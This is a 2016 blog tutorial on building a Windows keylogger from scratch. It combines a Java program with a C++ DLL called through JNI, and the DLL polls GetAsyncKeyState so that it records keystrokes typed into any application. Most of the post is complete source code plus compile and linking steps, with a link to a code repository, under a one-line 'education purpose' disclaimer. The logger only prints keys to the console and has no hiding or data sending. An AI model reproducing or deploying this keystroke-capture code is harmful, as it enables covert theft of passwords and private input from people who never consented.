Thursday, November 3, 2016

Creating your personal keylogger from scratch (No 3rd party library)

Aim
We will learn how you can create a very simple keylogger which can record all keystrokes and write those in a predefined location.

Languages Used
Java and C++

Software required for compiling C++
Dev C++ - https://sourceforge.net/projects/orwelldevcpp/

Why we need C++
Java cannot record the keystrokes when Java GUI is not in context.

Note
This tutorial is only for education purpose.

What you need to know beforehand
Java currently cannot record the keystrokes when Java GUI is not in context. In order to record all keystrokes, we will need help of C++.
JNI comes as rescue here. We can call C++ function on Java using JNI.
For this we make use of javah which comes as part of jdk installation. It is typically located at C:\Program Files\Java\jdk<version>\bin\javah.exe
javah helps to create header which is used by the C++ code

Java Code

1) Save below code in MyLogger.java within package named cooltrickshome

 package cooltrickshome;  
 import java.util.HashMap;  
 import java.util.Map;  
 public class MyLogger {  
  final static String key="BackSpace:8,Tab:9,Return:13,Shift:16,Control:17,Alt:18,Pause:19,CapsLock:20,Escape:27,Space:32,PageUp:33,PageDown:34,End:35,Home:36,Left:37,Up:38,Right:39,Down:40,PrintScreen:44,Insert:45,Delete:46,0:48,1:49,2:50,3:51,4:52,5:53,6:54,7:55,8:56,9:57,A:65,B:66,C:67,D:68,E:69,F:70,G:71,H:72,I:73,J:74,K:75,L:76,M:77,N:78,O:79,P:80,Q:81,R:82,S:83,T:84,U:85,V:86,W:87,X:88,Y:89,Z:90,LWin:91,RWin:92,Apps:93,NumPad0:96,NumPad1:97,NumPad2:98,NumPad3:99,NumPad4:100,NumPad5:101,NumPad6:102,NumPad7:103,NumPad8:104,NumPad9:105,Multiply:106,Add:107,Subtract:109,Decimal:110,Divide:111,F1:112,F2:113,F3:114,F4:115,F5:116,F6:117,F7:118,F8:119,F9:120,F10:121,F11:122,F12:123,F13:124,F14:125,F15:126,F16:127,NumLock:144,ScrollLock:145,LShift:160,RShift:161,LControl:162,RControl:163,LAlt:164,RAlt:165,SemiColon:186,Equals:187,Comma:188,UnderScore:189,Period:190,Slash:191,BackSlash:220,RightBrace:221,LeftBrace:219,Apostrophe:222";  
  static Map<Integer,String> keyList= new HashMap<Integer, String>();  
  static  
  {  
  System.loadLibrary("MyLogger");  
  }  
  public static native int GetKey();  
  public static void main(String[] args) {  
  loadKey();  
  for(int i=0;i<100;i++)  
  {  
  int d=GetKey();  
  System.out.print(keyList.get(d));  
  }  
  }  
  public static void loadKey()  
  {  
  String[] allKeys=key.split(",");  
  for(int i=0;i<allKeys.length;i++)  
  {  
  String[] keyDecoder=allKeys[i].split(":");   
  keyList.put(Integer.parseInt(keyDecoder[1]), keyDecoder[0]);  
  }  
  }  
 }  

2) Above program will load a library named MyLogger.dll & will call the function GetKey which is defined within the dll. GetKey will return the code of the key pressed which will be decoded using loadKey function and then shown to user. Above program will show 100 keys pressed but can be customised.

3) To create the MyLogger.dll we will need to make a header file which will be used by C++ using the above Java file. This is done using a utility javah.exe which comes along with jdk in your jdk/bin folder

4) First compile the MyLogger.java by moving to the directory where MyLogger.java is present and type below command in commandline.
 javac -d . MyLogger.java  

5) You will see a folder name cooltrickshome created, within which your keylogger class is present.

6) Now Run below command from commandline
 javah cooltrickshome.MyLogger  

7) cooltrickshome_MyLogger.h will be generated. Rename this to MyLogger.h

Now we will make the MyLogger.dll using the MyLogger.h we just created.

C++ code

1) Open Dev C++

2) Choose File->New->Project->Dll

3) Give a name to your project. For this exercise lets keep it MyLogger

4) Save your project.

5) You will see 2 tabs which are dllmain.cpp and dll.h as shown in DLLInitialPage.PNG


6) Replace content of dll.h with the header file created using javah utility earlier and save this as MyLogger.h

7) Now move to dllmain.cpp and replace the content with below. Save this as MyLogger.cpp

 #include <iostream>  
 #include <windows.h>  
 #include <fstream>  
 #include <jni.h>  
 #include "MyLogger.h"  
 JNIEXPORT jint JNICALL Java_cooltrickshome_MyLogger_GetKey(JNIEnv *, jclass){  
  while(true){  
     for(int c=8;c<=222;c++){  
      if(GetAsyncKeyState(c)==-32767)  
       return c;  
     }     
    }  
 }  

8) Now goto Tools->Compiler Options->Directories.

9) Choose tab C includes. Now add the entry C:\Program Files\Java\jdk<version>\include and C:\Program Files\Java\jdk<version>\include\win32

11) Move to C++ tab and add entry for C:\Program Files\Java\jdk<version>\include and C:\Program Files\Java\jdk<version>\include\win32

12) Click on OK

13) Goto Execute

14) MyLogger.dll is created at path where you saved the .cpp and .h files earlier

Run the Program (Assuming you are using Eclipse)

Link MyLogger.dll with the Java Project by following below steps:
1) Right click on project and click on Properties
2) Choose Java Build Path and choose source tab
3) Expand the project and click on Native Library Location
4) Click on Edit and point it to the location folder containing the dll
5) Save it.
6) Run the program
7) All key you type will be tracked even if you type in external application like Notepad.

Code Repo
All codes are available at https://github.com/csanuragjain/keylogger/

Let me know if you have any doubts :)

1 comment: